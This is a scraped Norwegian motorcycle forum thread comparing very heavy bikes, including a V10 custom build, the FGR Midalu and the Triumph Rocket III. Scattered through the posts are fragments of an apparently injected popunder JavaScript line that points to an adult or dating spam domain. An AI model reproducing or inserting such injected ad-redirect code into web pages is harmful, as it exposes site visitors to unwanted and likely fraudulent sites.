Virkelig tung motorsykkel …
Virkelig tung motorsykkel …
På mcsiden.no har det vært omtalt noen tunge motorsykler i det siste som ex Triumph Rocket og K1600 som blir smågutter da jeg kom over denne. Må jekkes opp på senterstøtta. Her er alt enormt
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Re: Virkelig tung motorsykkel …
Bjerknez … du har skrevet litt om dekkslitasje på din Triumph Rocket men her har du mer å frykte. Halvveis ut i filmen tar han sykkel’n ut for litt kjøring, 8 liters V10 og 600 kg
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
-
OnlineBjerknez
- Innlegg: 23041
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Virkelig tung motorsykkel …
Hehe, voldsomme greier det der ja. Men "pen" var den ikke. En motor med hjul i hver ende er det eneste jeg ser. Men ja, dette var voldsomt og kanskje for de mest interreserte
Men ja, Rocketen blir jo moped og alle andre sykler blir el-sparkesykler i forhold til denne.
Re: Virkelig tung motorsykkel …
Det stemmer, svingarmen er festa i motor og gaffel er montert på ei ramme i forkant motor så motor er også bærende her. Den er lang men når du ser den på veien er den «tøff» :) For de som er interessert ser du hvordan sykkel er bygget i filmen her, del 1
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
-
OnlineBjerknez
- Innlegg: 23041
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Virkelig tung motorsykkel …
Tøft prosjekt, helt klart og god underholdning. Men tøff var den ikke. Altså tøff i den grad at jeg ville kjøpt en sykkel som så slik ut. Den ser bare veldig hjemmelaga ut. Jeg foretrekker nok heller sykler som selges av de som faktisk kan design :)
Men denne hadde vel ikke vært lov og kjlre på veien her hjemme uansett? Eller har han fått godkjent den?
Men denne hadde vel ikke vært lov og kjlre på veien her hjemme uansett? Eller har han fått godkjent den?
Re: Virkelig tung motorsykkel …
Den er godkjent i England og profft bygget der bremser og materialer er produsert ut fra vekt og motor. Skal du bygge noe slik er første betingelse kontakt med rette instanser slik at de kan komme med sine innspill i forkant av byggeprosessen, for en del år tilbake var ikke det mulig men i dag kan det gå bra.
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
- AJ
- Administrator
- Innlegg: 37958
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Virkelig tung motorsykkel …
En monstermaskin dette også, FGR Midalu fra Tsjekkia .
Med verdens største MC-motor før Triumph oppgraderte sin trippel på Rocket'en. Nå er forskjellen kun 16 kubikkcm. i Triumphs favør.
https://www.midalu.eu/
Men hvordan det ligger an med dette tsjekkiske MC-merket nå om dagen, kjenner jeg ikke til.
Er vel ikke akkurat noe storsalg av denne motorsykkelen...
Med verdens største MC-motor før Triumph oppgraderte sin trippel på Rocket'en. Nå er forskjellen kun 16 kubikkcm. i Triumphs favør.
https://www.midalu.eu/
Men hvordan det ligger an med dette tsjekkiske MC-merket nå om dagen, kjenner jeg ikke til.
Er vel ikke akkurat noe storsalg av denne motorsykkelen...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineBjerknez
- Innlegg: 23041
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Virkelig tung motorsykkel …
Den så i vertfall bedre ut.AJ skrev: ↑12 mar 2022, 17:19 En monstermaskin dette også, FGR Midalu fra Tsjekkia .
Med verdens største MC-motor før Triumph oppgraderte sin trippel på Rocket'en. Nå er forskjellen kun 16 kubikkcm. i Triumphs favør.
https://www.midalu.eu/
Men hvordan det ligger an med dette tsjekkiske MC-merket nå om dagen, kjenner jeg ikke til.
Er vel ikke akkurat noe storsalg av denne motorsykkelen...
Men usikker på hvor mye for seg en 2.5 liter maskin har i en slik type sykkel. Det passer på en måte ikke...
Re: Virkelig tung motorsykkel …
Ja og med girpedal med mulighet for å sette i fri (N) … Han hadde noen bakdrev å velge i for å endre toppspeed. Her snakker vi moment
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Re: Virkelig tung motorsykkel …
Den var skikkelig finAJ skrev: ↑12 mar 2022, 17:19 En monstermaskin dette også, FGR Midalu fra Tsjekkia .
Med verdens største MC-motor før Triumph oppgraderte sin trippel på Rocket'en. Nå er forskjellen kun 16 kubikkcm. i Triumphs favør.
https://www.midalu.eu/
Men hvordan det ligger an med dette tsjekkiske MC-merket nå om dagen, kjenner jeg ikke til.
Er vel ikke akkurat noe storsalg av denne motorsykkelen...
dypen
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2
- AJ
- Administrator
- Innlegg: 37958
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Virkelig tung motorsykkel …
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
FGR Midalu
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Og her en... Jawa ?
FGR Midalu
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Og her en... Jawa ?
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineBjerknez
- Innlegg: 23041
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Virkelig tung motorsykkel …
Jeg tenker at 2.500 kubikk i en racing preget sykkel kun er en gimmick. Økt moment blir spist opp av vekten og bensinforbruk går opp. Vekten i seg selv setter større krav til bremser og dempere noe som fordyrer og i det hele tatt ganske teit.
Hele poenget med slike sykler er jo å lage de mest effektive og pålitelige syklene.
I en såkalt power cruiser hvor moment og kjlreglede på landevei er hovedmålet så er en slik stor motor langt bedre egnet synes jeg. Jeg synes Rocket har en fin balansegang her. Ikke voldsom i størrelse, og vekten er relativt lav i forhold til andre cruisere med 1200cc maskineri som veier omtrent det samme og sykkelen er faktisk moderne med alt av utstyr.
Ducati Diavel er vel den eneste direkte konkurrenten til Rocket. I mitt hode er ikke disse konkurrenter i det hele tatt. To forskjellige kundegrupper. I mine øyne ser Diavel ut som en plastleke bygget for den yngre garde, mens Rocket fremstår som mer "voksen" hvor dem har klart og gjøre motoren til en del av designet som utrykker sykkelen.
En Diavel er i mine øyne heller ingen power cruiser, men noe som befinner seg ett sted midt i mellom en nakensykkel og en cruiser. Jeg vil heller kalle Ducati en supernaked mer i konkurranse med KTM 1290 SuperDuke.
Rocket er ikke der i det hele tatt. Rocket er en renbarka powercruiser som vinner på moment, mens Diavel nok er den som vinner en 1/4 mile drag race. Men kanskje ikke en 0-100 test. Uten at jeg mener at noen av disse testene er så viktige.
Hele poenget med slike sykler er jo å lage de mest effektive og pålitelige syklene.
I en såkalt power cruiser hvor moment og kjlreglede på landevei er hovedmålet så er en slik stor motor langt bedre egnet synes jeg. Jeg synes Rocket har en fin balansegang her. Ikke voldsom i størrelse, og vekten er relativt lav i forhold til andre cruisere med 1200cc maskineri som veier omtrent det samme og sykkelen er faktisk moderne med alt av utstyr.
Ducati Diavel er vel den eneste direkte konkurrenten til Rocket. I mitt hode er ikke disse konkurrenter i det hele tatt. To forskjellige kundegrupper. I mine øyne ser Diavel ut som en plastleke bygget for den yngre garde, mens Rocket fremstår som mer "voksen" hvor dem har klart og gjøre motoren til en del av designet som utrykker sykkelen.
En Diavel er i mine øyne heller ingen power cruiser, men noe som befinner seg ett sted midt i mellom en nakensykkel og en cruiser. Jeg vil heller kalle Ducati en supernaked mer i konkurranse med KTM 1290 SuperDuke.
Rocket er ikke der i det hele tatt. Rocket er en renbarka powercruiser som vinner på moment, mens Diavel nok er den som vinner en 1/4 mile drag race. Men kanskje ikke en 0-100 test. Uten at jeg mener at noen av disse testene er så viktige.